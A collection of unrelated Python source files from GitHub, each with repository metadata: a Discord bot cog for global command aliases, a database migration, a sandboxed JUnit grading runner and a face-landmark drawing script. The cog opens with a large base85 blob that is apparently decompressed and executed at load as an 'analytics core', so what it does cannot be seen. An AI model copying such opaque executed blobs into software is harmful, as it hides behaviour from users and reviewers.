|KYb3nAo(D3N*jqx8}YH0ZT{`_d=dceSKGK)%DT(>D{@Oz2jmA@MhJ3e$0)fWT9uy=op<MfB6@-2KrMVS%9JTqqE=Obp+{=TFfvIcBP<V%F1-&Kr5ENQ4{8B
O-DM?sla&RYID~?N6EuFrUQ$MCB=~majN{JA+Mr>G0gxnz?*zZ$6X}YoDquT-f86S&9r_jl4^iwTB=b@dO<h-rGjr0zPBuz^FWl*PixdEmk567et~{sX$e;&
8hw@7@FLKBvxWZxR2upCDK-SAfuOtZ>?<UEL0#>bPz&m#k_EfT?6V$@c-S?1*oX@v%4J?ovJe=Ffg02v15~5{j(c*4z_SnsD`azD(52?Q`Wu16@BUW;Y3%YD
I)=&rtyM)rFj5W?JunahlgVRPl$V&C&BRKI6h$QzMFpXXsu7x!1gjEZWC@qCeduj65x|OLYty_TCL;TTlFtT?m((VE-w=RSO<GXUtMq1v9bTWD-x(+!=c5cU
u-JNvZ=%&fYkDWqE_d{1<>|oX?Tn2G64O>Hu6N^_?$cB)TyG=4V0GT<$$tOOjiqGg6Yg#f)QeNzC#b`#BGgYO?-{f{SeSVknN;R^@h&cZm3J@IxpK->s4_dW
J!rxLkJAGpKlhA5quEd29O8_b1C-D?IFe@9_jXS-pCCHLYPWXhUK6UR0$qA=R{Amo|$>cNWg?d1zX>eSKpBCK4Iu+}6D|=G2?KfoXCKqd=Y|Q!@`dHCGg@v{
vA$Z5dyJ<+eC&xFNPBQ-HUmQKiSM7yrrK|E5dKoHVjMCI*{|5XjK-hRoxfE?H>%7VQDis50t<T-{7R&*yNdElnjEIVy$Wqa#6}UueK}JZ;YuP80jPk8PX22@
?fs-R5ufnCP7+1I4tB2o(kPl4r*iS;&0X@%LZri7fyY#1ABHnz3YKWpp7TXabSjn;momJS$fEU9}3epF*a@*n;E(&?p(Kx;VjZ}=<Gteb=fmkF39Gebr&Y)j
}CI`&V#JvE5;9cOe$I&DwIcK3S0(WM=-FA1Qs{9-Bgtmar60ON}N1Y`!qS)%8K^$j)>^pSbB$ixCoa0<BU@bqEva{?J{lGorEQHBx$ERH_jk!1Y@gW}@T9`r
#?E758i1{u?F)W;7hkYl#mw*o-1$NfSNJ5MHHkpg0UF!__4)rMXp^P_R1{w2&j)S)*(Rn7Icog3e|1$4m*>^&IpbJI}dPqMdW~P?1OQsGAGQsgxjAs2HHrr@
Uu_tG{KEibSt2hp*w>;;6`u^-us%TPoaOVJ_?FPO$^>8k0HZC^DBEVf_F7FnB+e@mz5Ph%uUiTzW2WfG~IS@6vhTA70{2-iN)(RAJ4IWC#7^Vpt7a5K@&~#!
IKTr@4s_iWEiu2X~OGbpi#AE1zlWirPcza;tQmxNBas>$asN8nCtL4HbJNJw=Mg2f&Qo;;0AJ=Pl%yz>lwi3o^V?@NcsN<x-K=3~6Aa*tDu}Nq`h=X?O$+(}
G#iwVecFa^RZnvc3UWk3%z+7%&BvtLF^Ru(`{Onm6ct(to99#bX&-NrI4A-LMkD7_tX2?~6ZC!o~1n-D?0wl>Ckrc%k^6QM?QSgxi)qIOAz~S9voLkS~9jUd
2QRvhMhN7IVupD@Dc%||!)wb6GWa<j|4A7w^>1*G#geQy>+K)ZWl+Q>%nQt4gWkAZP9DIR5AB$NBZn~vz>MkF(Q^sY!XeEmiihsn({31b~az08JoJJ#h3c}f
p5@@p1uZ)0wyV4eVv6#)ZuBnR+O{?2~#O=WX>|hTRpjFOeVaH+?)1<@5zZB3O7atkQq3>a@-XQ)u=e|AQBOb{yxSwh(gxjx~Vv~$|jVJh*@h8bDT~B=5AKTB
gN|&SdeV*g%SW;!~C5(noym~n<pmP|pKUV5q8kb0-nBhD;q$Tq#fK4)JPKcs^U5or(L8H~9`^>)Z?6B?O_nr{EyXCH+`{upZAEX~!wi8Yv=mFA^{NoWvRbQE
KO5Mv*BE!$bYYEr0ovE^y*)}a6NFOjJjE0+|{YfciCAuY+A)JkO+6tU#`RKipPqs58oQ-)JL1o*<C-bic2Y}+c08GsIZUU3Cv*4w^k5I{Db50K0bKPSFshmx
Rj(Y0|;SU2d?s+MPi6(PPLva(Jw(n0~TKDN@5O)F|k^_pcwolv^jBVTLhNqMQ#x6WU9J^I;wLr}Cut#l+JlXfh1Bh<$;^|hNLoXLD#f*Fy-`e~b=ZU8rA0GJ
FU1|1o`VZODxuE?x@^rESdOK`qzRAwqpai|-7cM7idki4HKY>0$z!aloMM7*HJs+?={U5?4IFt""".replace("\n", ""))))
# End analytics core
class GlobalAlias:
def __init__(self, bot):
self.bot = bot
self.aliases = dataIO.load_json(JSON)
try:
self.analytics = CogAnalytics(self)
except Exception as error:
self.bot.logger.exception(error)
self.analytics = None
def save(self):
dataIO.save_json(JSON, self.aliases)
@commands.group(pass_context=True)
@checks.is_owner()
async def galias(self, ctx):
"""Manage global aliases for commands"""
if ctx.invoked_subcommand is None:
await self.bot.send_cmd_help(ctx)
@galias.command(name="add", pass_context=True)
async def _add_alias(self, ctx, command, *, to_execute):
"""
Add a global alias for a command
Example: !galias add test flip @Twentysix
"""
command = command.lower()
server = ctx.message.server
if ' ' in command:
await self.bot.say("Aliases can't contain spaces.")
return
existing = self.servers_with_alias(command)
if existing:
this_server = server in existing
incl = ", including this one" if this_server else ""
await self.bot.say(warning("{} is already a regular alias in "
"{} servers{}. In those servers, the "
"existing alias will take priority."
).format(command, len(existing), incl))
new_message = copy(ctx.message)
new_message.content = to_execute
prefix = await self.get_prefix(new_message)
if prefix is not None:
to_execute = to_execute[len(prefix):]
if command in self.bot.commands:
await self.bot.say(warning("Cannot add '{}', because it's a real "
"bot command.".format(command)))
elif command in self.aliases:
await self.bot.say(warning("The alias '{0}' already exists. "
"Remove it first, or use `{1}galias "
"edit {0} ...`".format(command, prefix)
))
else:
self.aliases[command] = to_execute
self.save()
await self.bot.say("Global alias '{}' added.".format(command))
@galias.command(name="edit", pass_context=True)
async def _edit_alias(self, ctx, command, *, to_execute):
"""Edits an alias"""
new_message = copy(ctx.message)
new_message.content = to_execute
prefix = await self.get_prefix(new_message)
if prefix is not None:
to_execute = to_execute[len(prefix):]
if command in self.aliases:
self.aliases[command] = to_execute
self.save()
await self.bot.say("Global alias '{}' updated.".format(command))
else:
await self.bot.say(warning("That alias doesn't exist."))
@galias.command(name="rename", pass_context=True)
async def _rename_alias(self, ctx, old_name, new_name):
"""Edits an alias"""
server = ctx.message.server
if ' ' in new_name:
await self.bot.say("Aliases can't contain spaces.")
return
existing = self.servers_with_alias(new_name)
if existing:
this_server = server in existing
incl = ", including this one" if this_server else ""
await self.bot.say(warning("{} is already a regular alias in "
"{} servers{}. In those servers, the "
"existing alias will take priority."
).format(new_name, len(existing), incl))
if new_name in self.bot.commands:
await self.bot.say(warning("Cannot rename to '{}', because it's a"
" real bot command.".format(new_name)))
elif new_name in self.aliases:
await self.bot.say(warning("The alias '{}' already exists.".format(new_name)))
elif old_name in self.aliases:
self.aliases[new_name] = self.aliases.pop(old_name)
self.save()
await self.bot.say("Global alias '{}' renamed to '{}'."
.format(old_name, new_name))
else:
await self.bot.say(warning("Alias '{}' doesn't exist.".format(old_name)))
@galias.command(name="help", pass_context=True)
async def _help_alias(self, ctx, command):
"""Tries to execute help for the base command of the alias"""
if command in self.aliases:
help_cmd = self.aliases[command].split(" ")[0]
new_content = ctx.prefix
new_content += "help "
new_content += help_cmd[len(ctx.prefix):]
message = ctx.message
message.content = new_content
await self.bot.process_commands(message)
else:
await self.bot.say(warning("That alias doesn't exist."))
@galias.command(name="show")
async def _show_alias(self, command):
"""Shows what command the alias executes."""
if command in self.aliases:
await self.bot.say(box(self.aliases[command]))
else:
await self.bot.say(warning("That alias doesn't exist."))
@galias.command(name="del", pass_context=True, aliases=['remove'])
async def _del_alias(self, ctx, command):
"""Deletes an alias"""
command = command.lower()
if command in self.aliases:
self.aliases.pop(command, None)
self.save()
await self.bot.say("Global alias '{}' deleted.".format(command))
else:
await self.bot.say(warning("That alias doesn't exist."))
@galias.command(name="list", pass_context=True)
async def _alias_list(self, ctx):
"""Lists global command aliases"""
header = "Alias list:\n"
shorten = len(header) + 8
alias_list = ""
if not self.aliases:
await self.bot.say("There are no global aliases.")
return
for alias in sorted(self.aliases):
alias_list += alias + '\n'
pages = pagify(alias_list, shorten_by=shorten)
for i, page in enumerate(pages):
if i == 0:
page = header + box(page)
else:
page = box(page)
await self.bot.say(page)
@galias.command(name="overrides")
async def _show_overrides(self, alias):
"""Shows which servers have a regular alias set."""
if not self.bot.get_cog('Alias'):
await self.bot.say(warning("The alias cog must be loaded to "
"check for local overrides."))
return
servers = self.servers_with_alias(alias)
if not servers:
await self.bot.say("No servers have '{}' as a local alias.".format(alias))
return
servers = sorted(servers, key=lambda s: s.name)
servers_str = ' Server ID | Server Name\n'
servers_str += '\n'.join('{0.id:>20} | {0.name}'.format(s) for s in servers)
for page in pagify(servers_str):
await self.bot.say(box(page))
async def on_message(self, message):
if not self.bot.user_allowed(message):
return
server = message.server
prefix = await self.get_prefix(message)
msg = message.content
if prefix:
alias = self.first_word(msg[len(prefix):]).lower()
if alias not in self.aliases:
return
elif alias in self.bot.commands:
return
if server and alias in self.get_existing_aliases(server):
return
new_command = self.aliases[alias]
args = message.content[len(prefix + alias):]
new_message = copy(message)
new_message.content = prefix + new_command + args
await self.bot.process_commands(new_message)
async def on_command(self, command, ctx):
if ctx.cog is self and self.analytics:
self.analytics.command(ctx)
def part_of_existing_command(self, alias):
'''Command or alias'''
for command in self.bot.commands:
if alias.lower() == command.lower():
return True
return False
def get_existing_aliases(self, server):
if server is None:
return {}
try:
alias_cog = self.bot.get_cog('Alias')
return alias_cog.aliases[server.id]
except Exception:
return {}
def servers_with_alias(self, alias):
servers = set()
try:
alias_cog = self.bot.get_cog('Alias')
aliases = alias_cog.aliases
for sid, alias_map in aliases.items():
server = self.bot.get_server(sid)
if server and alias in alias_map:
servers.add(server)
except Exception:
pass
finally:
return servers
def first_word(self, msg):
return msg.split(" ")[0]
async def get_prefix(self, msg):
prefixes = self.bot.command_prefix
if callable(prefixes):
prefixes = prefixes(self.bot, msg)
if asyncio.iscoroutine(prefixes):
prefixes = await prefixes
for p in prefixes:
if msg.content.startswith(p):
return p
return None
def check_folder():
if not os.path.exists(PATH):
print("Creating data/galias folder...")
os.makedirs(PATH)
def check_file():
if not dataIO.is_valid_json(JSON):
print("Creating aliases.json...")
dataIO.save_json(JSON, {})
def setup(bot):
check_folder()
check_file()
bot.add_cog(GlobalAlias(bot))
| calebj/calebj-cogs | galias/galias.py | galias.py | py | 13,524 | python | en | code | 47 | github-code | 1 | [
{
"api_name": "zlib.decompress",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "base64.b85decode",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "utils.dataIO.dataIO.load_json",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "utils.... |
24154699064 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Add authorization models
Revision ID: 011
Revises: 010
Create Date: 2014-03-21 17:44:51.248232
"""
# revision identifiers, used by Alembic.
revision = '011'
down_revision = '010'
from alembic import op
import sqlalchemy as sa
MYSQL_ENGINE = 'InnoDB'
MYSQL_CHARSET = 'utf8'
def upgrade(active_plugins=None, options=None):
op.create_table(
'authorizationcodes',
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('code', sa.Unicode(100), nullable=False),
sa.Column('state', sa.Unicode(100), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('is_active', sa.Boolean(), default=True, server_default="1",
nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id'),
mysql_engine=MYSQL_ENGINE,
mysql_charset=MYSQL_CHARSET
)
op.create_table(
'bearertokens',
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('access_token', sa.Unicode(100), nullable=False),
sa.Column('refresh_token', sa.Unicode(100), nullable=False),
sa.Column('expires_in', sa.Integer(), nullable=False),
sa.Column('expires_at', sa.DateTime(), nullable=False),
sa.Column('is_active', sa.Boolean(), default=True, server_default="1",
nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id'),
mysql_engine=MYSQL_ENGINE,
mysql_charset=MYSQL_CHARSET
)
def downgrade(active_plugins=None, options=None):
op.drop_table('bearertokens')
op.drop_table('authorizationcodes')
| pombredanne/storyboard | storyboard/db/migration/alembic_migrations/versions/011_authorization_models.py | 011_authorization_models.py | py | 2,556 | python | en | code | null | github-code | 1 | [
{
"api_name": "alembic.op.create_table",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 36,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.DateT... |
73184180514 | """
Helpers for processing JUnit evaluations.
"""
import os
import stat
import patoolib
import glob
import subprocess32 as subprocess
from application import app
from application.models import TestResult, TestCase
from flask import render_template
from shutil import move
import xml.etree.ElementTree as ET
from shutil import rmtree
from tempfile import mkdtemp
class Enumerator(object):
"""Simple enumerator for the lowercase ascii alphabet."""
def __init__(self, banned_words_list):
self.token = ['a']
self.symbol_table = set()
for word in banned_words_list:
self.symbol_table.add(word)
def get_token(self):
while "".join(self.token) in self.symbol_table:
self.increment_token()
token = "".join(self.token)
self.symbol_table.add(token)
self.increment_token()
return token
def increment_token(self):
if self.token[-1] != 'z':
self.token[-1] = chr(ord(self.token[-1]) + 1)
elif len(self.token) == 1:
self.token = ['a', 'a']
else:
# Either all chars are 'z' or one can be
if all([x == 'z' for x in self.token]):
self.token.append('a')
else:
# Go back recursively
self.increment_helper()
def increment_helper(self):
if self.token[-1] != 'z':
self.token[-1] = chr(ord(self.token[-1]) + 1)
self.token.append('a')
else:
self.token = self.token[:-1]
self.increment_helper()
class DirectoryError(Exception):
def __init__(self, value):
self.value = value
super(DirectoryError, self).__init__()
class SRCError(Exception):
def __init__(self, value):
self.value = value
super(SRCError, self).__init__()
def copy_junit_tests(project, working_directory, buffer_size):
"""
Creates JUNIT directory structure in ANT_TESTS_DIR_NAME
and extract the project tests in it.
@param project the project to run, we extract the tests in it
@param working_directory is a random folder name for this run of the project
@buffer_size is provided by FILE_BUFFER_SIZE in config
"""
tests_dir = os.path.join(
working_directory, app.config['ANT_TESTS_DIR_NAME'])
app.logger.info('using {0} as test directory initially'.format(tests_dir))
os.mkdir(tests_dir)
# Write each junit in the project to the tests dir
for junit in project.tests:
with open(os.path.join(tests_dir, junit.filename), "wb") as outfile:
buff = junit.read(buffer_size)
while len(buff) != 0:
outfile.write(buff)
buff = junit.read(buffer_size)
def prepare_for_source(submission, enumerator, in_use_names, working_directory):
"""
Makes sure the source archive can be written without overwriting any existing files.
returns dict of renamed files.
Doesn't rename source archive.
"""
renamed_files = {}
src_arch_name = submission.code.get().filename
src_arch_name_split = src_arch_name.split('.')
arch_no_ext_nm = src_arch_name_split[0]
abs_arch_no_ext_nm = os.path.join(working_directory, arch_no_ext_nm)
if arch_no_ext_nm in in_use_names:
renamed_files[arch_no_ext_nm] = enumerator.get_token()
move(abs_arch_no_ext_nm, os.path.join(
working_directory, renamed_files[arch_no_ext_nm]))
if src_arch_name in in_use_names and src_arch_name != arch_no_ext_nm:
renamed_files[src_arch_name] = enumerator.get_token()
move(abs_arch_no_ext_nm, os.path.join(
working_directory, renamed_files[src_arch_name]))
return renamed_files
def extract_source(submission, working_directory, buffer_size):
"""Writes the source archive and extracts it."""
# Copy archive
abs_arch_name = os.path.join(
working_directory, submission.code.get().filename)
prev_entry_count = len(os.listdir(working_directory))
with open(abs_arch_name, "wb") as archive_out:
buff = submission.code.read(buffer_size)
while len(buff) != 0:
archive_out.write(buff)
buff = submission.code.read(buffer_size)
after_entry_count = len(os.listdir(working_directory))
if after_entry_count < prev_entry_count + 1:
message = 'Working directory entry count assertion failed. Before write {0} after write {1}'.format(
prev_entry_count, after_entry_count)
app.logger.error(message)
raise DirectoryError(message)
# Extract archive
prev_entry_count = after_entry_count
patoolib.extract_archive(abs_arch_name, outdir=working_directory)
after_entry_count = len(os.listdir(working_directory))
os.remove(abs_arch_name)
if after_entry_count < prev_entry_count + 1:
message = 'Working directory entry count assertion failed. Before extraction {0} after extraction {1}'.format(
prev_entry_count, after_entry_count)
app.logger.error(message)
raise DirectoryError(message)
def determine_src_dir(in_use_names, renamed_files, working_directory):
"""Attempts to determine source directory name"""
candidates = [entry for entry in os.listdir(working_directory)
if (entry not in in_use_names) and (entry not in renamed_files.values())]
if len(candidates) != 1:
message = 'Could not determine working directory. Candidates {0},\ndirectory entries{1},\nrenamed_files {2},\nin_use_names: {1}'
message = message.format(','.join(candidates), ','.join(os.listdir(
working_directory)), ','.join(renamed_files.items()), ','.join(in_use_names))
app.logger.error(message)
raise SRCError(message)
else:
return candidates[0]
def create_ant_build_file(project, in_use_names, renamed_files, working_directory):
"""Creates ant build file."""
src_dir = determine_src_dir(in_use_names, renamed_files, working_directory)
# Paths in build.xml are relative not absolute.
context = {
"src_dir": src_dir,
"tests_dir": renamed_files.get(app.config['ANT_TESTS_DIR_NAME'], app.config['ANT_TESTS_DIR_NAME']),
"plain_format": False,
"xml_format": True,
"build_dir": renamed_files.get(app.config['ANT_BUILD_DIR_NAME'], app.config['ANT_BUILD_DIR_NAME']),
"has_tests": project.has_tests,
"has_class_files": project.has_class_files,
"working_directory": working_directory,
"test_files": [test.filename for test in project.tests]
}
if project.has_class_files:
context["test_classes"] =\
[test.filename for
test in project.tests if test.filename.endswith(".class")]
else:
context["test_classes"] =\
[test.filename.replace('.java', '.class') for test in project.tests]
ant_build_template = render_template('runner/build.xml', **context)
build_abs_fname = os.path.join(
working_directory, renamed_files.get(app.config['ANT_BUILD_FILE_NAME'], app.config['ANT_BUILD_FILE_NAME']))
with open(build_abs_fname, "w") as script_file:
script_file.write(ant_build_template)
def create_ant_script_file(project, in_use_names, renamed_files, working_directory):
"""Creates ant script runner"""
script_abs_fname = os.path.join(working_directory, renamed_files.get(
app.config['ANT_RUN_FILE_NAME'], app.config['ANT_RUN_FILE_NAME']))
context = {
'buildfile_name': renamed_files.get(app.config['ANT_BUILD_FILE_NAME'], app.config['ANT_BUILD_FILE_NAME']),
"has_class_files": project.has_class_files,
'has_tests': project.has_tests,
'test_timeout': project.test_timeout_seconds
}
rendered_script = render_template('runner/ant_script.sh', **context)
with open(script_abs_fname, "w") as script_file:
script_file.write(rendered_script)
script_st = os.stat(script_abs_fname)
os.chmod(script_abs_fname, script_st.st_mode | stat.S_IEXEC)
def setup_directory(submission, project, working_directory):
"""
Sets up the directory layout.
"""
BUFFER_SIZE = app.config['FILE_BUFFER_SIZE']
if project.has_tests:
copy_junit_tests(project, working_directory, BUFFER_SIZE)
# Check if archive clashes
in_use_names = os.listdir(working_directory) + [app.config[
'ANT_BUILD_FILE_NAME'] + app.config['ANT_RUN_FILE_NAME'] + app.config['ANT_BUILD_DIR_NAME']]
enumerator = Enumerator(in_use_names)
renamed_files = prepare_for_source(
submission, enumerator, in_use_names, working_directory)
extract_source(submission, working_directory, BUFFER_SIZE)
app.logger.info('Directory after extraction:[{0}]'.format(
','.join(os.listdir(working_directory))))
before_ant_scripts = len(os.listdir(working_directory))
create_ant_build_file(
project, in_use_names, renamed_files, working_directory)
create_ant_script_file(
project, in_use_names, renamed_files, working_directory)
after_ant_scripts = len(os.listdir(working_directory))
if after_ant_scripts != before_ant_scripts + 1:
message = 'Failed before and after sanity check for ant scripts entries: {0}'.format(
','.join(os.listdir(working_directory)))
app.logger.error(message)
return renamed_files
def parse_junit_results(test_res_dir, subm):
"""
Parses XML output. Creates embedded TestResult and TestCase documents.
Doesn't save submission.
param: ters_res_dir path to directory where reports are.
param: subm submission document instance.
"""
files = glob.glob(os.path.join(test_res_dir, '*.xml'))
test_results = {}
for junit_report in files:
# Process each junit report
tree = ET.parse(junit_report)
for test_case_elm in tree.iterfind('testcase'):
# Process each test case in a junit file
class_name = test_case_elm.attrib['classname']
# class name is something like FooTest which is the class
# the tests were declared at
if class_name not in test_results:
# Create new result if needed
test_results[class_name] = TestResult(
name=class_name, success=True)
# Populate case
case = TestCase(
name=test_case_elm.attrib['name'], passed=True, detail='')
for failure in test_case_elm.iterfind('failure'):
# If it has a failure child then it failed.
case.passed = False
case.detail += failure.text + '\n'
for err in test_case_elm.iterfind('error'):
# If it has an error child then it failed.
case.passed = False
case.error = True
case.detail += err.text + '\n'
case.save()
test_results[class_name].cases.append(case)
test_results[class_name].success &= case.passed
subm.test_results = test_results.values()
for r in subm.test_results:
r.save()
subm.save()
def run_sandbox(working_directory, selinux_directory, renamed_files, submission):
"""Initiates SELinux Sanbox."""
command = ['sandbox', '-M', '-H', working_directory, '-T',
selinux_directory, 'bash',
renamed_files.get(app.config['ANT_RUN_FILE_NAME'], app.config['ANT_RUN_FILE_NAME'])]
app.logger.info('Lauching {0}'.format(' '.join(command)))
process = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
submission.compile_status = ('THE SOURCE WAS COMPILED SUCCESFULLY'
in stderr or 'THE SOURCE WAS COMPILED SUCCESFULLY' in stdout)
app.logger.info(stderr)
app.logger.info(stdout)
submission.compiler_out = stderr + '\n' + stdout
ant_build_dir_name = renamed_files.get(
app.config['ANT_BUILD_DIR_NAME'], app.config['ANT_BUILD_DIR_NAME'])
if submission.compile_status and not ant_build_dir_name in os.listdir(working_directory):
app.logger.error('Error unknown reason for compilation faliure.')
submission.compile_status &= ant_build_dir_name in os.listdir(
working_directory)
def extract_team_grade_submissions(grades):
"""
write all submissions to disk then zip them in one archive file
return that file for downlaod
"""
# First we need to create the temporary directories
class TempDirectories(object):
def __enter__(self):
self.dirs = mkdtemp()
return self.dirs
def __exit__(self, type, value, traceback):
if app.config['CLEAN_TEMP_DIRS']:
# rmtree(self.dirs[0])
pass
buffer_size = app.config['FILE_BUFFER_SIZE']
working_directory = ''
with TempDirectories() as directories:
try:
working_directory = directories
arch_dir = os.path.join(working_directory, 'arch')
os.mkdir(arch_dir)
app.logger.info('using {0} as directory'.format(working_directory))
# Populate directory
for grade in grades:
submission = grade.best_submission
src_arch_name = submission.code.get().filename
src_arch_name_split = src_arch_name.split('.')
arch_ext = src_arch_name_split[-1]
arch_nm = "Team_" + grade.team_id + "." + arch_ext
abs_arch_name = os.path.join(arch_dir, arch_nm)
prev_entry_count = len(os.listdir(arch_dir))
with open(abs_arch_name, "wb") as archive_out:
buff = submission.code.read(buffer_size)
while len(buff) != 0:
archive_out.write(buff)
buff = submission.code.read(buffer_size)
after_entry_count = len(os.listdir(arch_dir))
if after_entry_count < prev_entry_count + 1:
message = 'Working directory entry count assertion failed. Before write {0} after write {1}'.format(
prev_entry_count, after_entry_count)
app.logger.error(message)
raise DirectoryError(message)
except DirectoryError as de:
print(de.value)
pass
print(working_directory)
return working_directory
def junit_submission(submission, project):
# First we need to create the temporary directories
class TempDirectories(object):
def __enter__(self):
self.dirs = mkdtemp(), mkdtemp()
return self.dirs
def __exit__(self, type, value, traceback):
if app.config['CLEAN_TEMP_DIRS']:
rmtree(self.dirs[0])
rmtree(self.dirs[1])
with TempDirectories() as directories:
try:
working_directory, selinux_directory = directories
app.logger.info('using {0} and {1} as directories'.format(working_directory, selinux_directory))
# Populate directory
renamed_files = setup_directory(
submission, project, working_directory)
run_sandbox(
working_directory, selinux_directory, renamed_files, submission)
if submission.compile_status and project.has_tests:
tests_dir = os.path.join(working_directory,
renamed_files.get(app.config['ANT_BUILD_DIR_NAME'], app.config['ANT_BUILD_DIR_NAME']))
tests_dir = os.path.join(tests_dir, 'tests')
parse_junit_results(tests_dir, submission)
submission.processed = True
submission.save()
except DirectoryError as de:
submission.compile_status = False
submission.processed = True
submission.compiler_out = de.value
submission.save()
except SRCError as se:
submission.compile_status = False
submission.compiler_out = se.value
submission.processed = True
submission.save()
| amrdraz/java-project-runner | application/junit.py | junit.py | py | 16,172 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.path.join",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 80,
"usage_type": "attribute"
},
{
"api_name": "application.app.config",
"line_number": 81,
"usage_type": "attribute"
},
{
"api_name": "application.app... |
5417912 | import logging
from CosmoTech_Acceleration_Library.Modelops.core.common.graph_handler import VersionedGraphHandler
from CosmoTech_Acceleration_Library.Modelops.core.utils.model_util import ModelUtil
from redis.commands.graph.query_result import QueryResult
logger = logging.getLogger(__name__)
class ModelReader(VersionedGraphHandler):
"""
Model Reader for cached data
"""
def get_twin_types(self) -> list:
"""
Get twin types
:return: twin types list
"""
return [item for sublist in self.graph.labels() for item in sublist]
def get_twins_by_type(self, twin_type: str, limit: int = 0) -> QueryResult:
"""
Get twins by type
:param twin_type: the twin type requested
:param limit: the limit number of twin retrieved
:return: the twin list corresponding to twin type parameter
"""
twin_query = f'MATCH (node:{twin_type}) RETURN node'
if limit != 0:
twin_query = f'{twin_query} LIMIT {str(limit)}'
logger.debug(f"Query : {twin_query}")
return self.graph.query(twin_query, read_only=True)
def get_twin_properties_by_type(self, twin_type: str) -> list:
"""
Get twin properties regarding a twin_type
Note: this will work if all twin (with the same type) have same properties set
:param twin_type: the twin type
:return: the properties list
"""
result = []
twin_result = self.get_twins_by_type(twin_type, 1)
result_set = twin_result.result_set
if result_set and result_set[0]:
for key, val in result_set[0][0].properties.items():
if str(key) != ModelUtil.dt_id_key:
result.append(str(key))
else:
result.append(ModelUtil.id_key)
return result
def get_relationship_types(self) -> list:
"""
Get relationship types
:return: relationship types list
"""
return [item for sublist in self.graph.relationship_types() for item in sublist]
def get_relationships_by_type(self, relationship_type: str, limit: int = 0) -> QueryResult:
"""
Get relationships by type
:param relationship_type: the relationship type requested
:param limit: the limit number of twin retrieved
:return: the relationship list corresponding to relationship type parameter
"""
rel_query = f'MATCH (n)-[relation:{relationship_type}]->(m) RETURN n.{ModelUtil.dt_id_key} as {ModelUtil.source_key}, ' \
f'm.{ModelUtil.dt_id_key} as {ModelUtil.target_key}, relation'
if limit != 0:
rel_query = f'{rel_query} LIMIT {str(limit)}'
logger.debug(f"Query : {rel_query}")
return self.graph.query(rel_query, read_only=True)
def get_relationship_properties_by_type(self, relationship_type: str) -> list:
"""
Get relationship properties regarding a relationship_type
Note: this will work if all relationship (with the same type) have same properties set
:param relationship_type: the relationship type
:return: the properties list
"""
result = [ModelUtil.source_key, ModelUtil.target_key]
relationship_result = self.get_relationships_by_type(relationship_type, 1)
result_set = relationship_result.result_set
if result_set and result_set[0]:
# relationship
for key, val in result_set[0][2].properties.items():
if not str(key) in result:
if str(key) == ModelUtil.dt_id_key:
result.append(ModelUtil.id_key)
elif str(key) != ModelUtil.src_key and str(key) != ModelUtil.dest_key:
result.append(str(key))
return result
def query(self, query: str, params: dict = None, timeout: int = None, read_only: bool = False) -> QueryResult:
"""
Run specified query
:param query: the query to run
:param params: the parameters for the query if any
:param timeout: a specific timeout
:param read_only: executes a readonly query if set to True
:return: the QueryResult corresponding to specified query
"""
logger.debug(f"Query : {query} with params : {params}")
return self.graph.query(q=query, params=params, timeout=timeout, read_only=read_only)
def exists(self, key) -> bool:
"""
Check if a key exists in Redis
:param key: the key
:return: True if exists else False
"""
return False if self.r.exists(key) == 0 else True
| Cosmo-Tech/CosmoTech-Acceleration-Library | CosmoTech_Acceleration_Library/Modelops/core/io/model_reader.py | model_reader.py | py | 4,696 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "CosmoTech_Acceleration_Library.Modelops.core.common.graph_handler.VersionedGraphHandler",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "redis.commands.graph.query_result.QueryR... |
12015108525 |
import os
from dragonEyes.align_dlib import AlignDlib
import csv
import glob
import cv2
from PIL import Image, ImageDraw
import pandas as pd
from random import shuffle
align_dlib = AlignDlib(os.path.join(os.path.dirname(__file__), 'transferredSkills/dlib_models/shape_predictor_68_face_landmarks.dat'))
def draw_on_image(image, out_loc, boxes, face_landmarks_list = None):
#image = utils.loadImage(image_path)
colors = ['blue', 'red', '#7FFF00', 'yellow', '#BF3EFF', '#121212', '#FF69B4', '#FFA54F']
# Find all facial features in all the faces in the image
#face_landmarks_list = utils.facePoints(image)
#boxes = utils.getFaceBounds(image, 2, 'hog')
pil_image = Image.fromarray(image)
d = ImageDraw.Draw(pil_image, 'RGBA')
if face_landmarks_list:
for i in range(len(face_landmarks_list)):
color = colors[i%len(colors)]
face_landmarks = face_landmarks_list[i]
# Make the eyebrows into a nightmare
d.point(face_landmarks['left_eyebrow'], fill=color)
d.point(face_landmarks['right_eyebrow'], fill=color)
d.point(face_landmarks['chin'], fill=color)
# lips
d.point(face_landmarks['top_lip'], fill=color)
d.point(face_landmarks['bottom_lip'], fill=color)
'''
d.polygon(face_landmarks['top_lip'], fill=(150, 0, 0, 128))
d.polygon(face_landmarks['bottom_lip'], fill=(150, 0, 0, 128))
d.line(face_landmarks['top_lip'], fill=(150, 0, 0, 64), width=8)
